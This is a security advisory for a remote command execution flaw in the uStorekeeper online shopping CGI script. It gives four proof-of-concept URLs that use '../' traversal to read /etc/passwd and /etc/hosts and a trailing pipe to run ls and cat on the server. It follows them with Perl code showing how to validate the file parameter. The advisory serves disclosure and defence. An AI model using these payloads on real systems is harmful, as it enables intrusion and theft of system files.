
Microburst uStorekeeper Remote Command Execution Vulnerability


Published: 2001-04-12
Updated: 2001-04-12
Severity:
Threat: ordinary user access privileges
Bug type: input validation error
Exploit type: server

Affected systems
Microburst uStorekeeper Online Shopping System 1.8.1
Microburst uStorekeeper Online Shopping System 1.6.9
Microburst uStorekeeper Online Shopping System 1.6.7
Microburst uStorekeeper Online Shopping System 1.6.1
Microburst uStorekeeper Online Shopping System 1.6
Microburst uStorekeeper Online Shopping System 1.5.5
Microburst uStorekeeper Online Shopping System 1.5.3
Microburst uStorekeeper Online Shopping System 1.5.2
Microburst uStorekeeper Online Shopping System 1.1.5
Microburst uStorekeeper Online Shopping System 1.1
Microburst uStorekeeper Online Shopping System 1.0.7
Microburst uStorekeeper Online Shopping System 1.0.5
Microburst uStorekeeper Online Shopping System 1.0.3
Microburst uStorekeeper Online Shopping System 1.0.1
Detailed description
A vulnerability exists in the uStorekeeper Online Shopping System. Because the script does not properly validate user-supplied input, a remote user can request a URL containing sequences such as '../' to read arbitrary files and execute arbitrary commands.

Test code
http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts

http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |

http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd

http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../bin/cat%20ustorekeeper.pl|
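The requests above show the two defects behind the advisory: unchecked '../' components and a trailing '|', which a Perl 2-argument open() treats as a shell pipe. The following Perl is an added illustration of how a "file" parameter such as the one used by command=goto can be validated; it is not code from uStorekeeper, and the base directory, function names and sample inputs are constructed for the example.

```perl
#!/usr/bin/perl
# Added example, not from the uStorekeeper product: whitelist a CGI
# "file" parameter and open it safely.  BASE_DIR and the function
# names are hypothetical.
use strict;
use warnings;
use File::Spec;

# Assumption: pages may only be served from this directory.
my $BASE_DIR = '/var/www/ustorekeeper/pages';

# Returns the absolute path to open, or undef if the value is rejected.
sub resolve_safe_file {
    my ($file) = @_;
    return undef unless defined $file && length $file;

    # Allow only a plain relative name: letters, digits, dot, dash,
    # underscore and '/'.  This excludes the '|' and the space that
    # turn a 2-argument open() into a command, and absolute paths.
    return undef unless $file =~ m{\A[A-Za-z0-9_.-][A-Za-z0-9_./-]*\z};

    # Reject every '..' component explicitly; canonpath() below only
    # tidies separators, it does not resolve '..' itself.
    return undef if grep { $_ eq '..' } split m{/}, $file;

    my $canon = File::Spec->canonpath(File::Spec->catfile($BASE_DIR, $file));
    # Final containment check: the result must stay under BASE_DIR.
    return undef unless index($canon, "$BASE_DIR/") == 0;
    return $canon;
}

# Always use the 3-argument open with an explicit mode, so the file
# name can never be interpreted as a pipe or redirection.
sub read_page {
    my ($file) = @_;
    my $path = resolve_safe_file($file) or return undef;
    open(my $fh, '<', $path) or return undef;
    local $/;
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Constructed sample inputs shaped like the advisory's URLs.
for my $f ('index.html', 'catalog/list.html',
           '../../../../../../../../etc/hosts',
           '../../../../../../../../bin/ls |') {
    printf "%-40s %s\n", $f,
        defined resolve_safe_file($f) ? 'accepted' : 'rejected';
}
```

The two traversal inputs are rejected by the character whitelist and the '..' check before any filesystem access, while the legitimate page names resolve to paths under BASE_DIR.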

Solution
None yet

Related information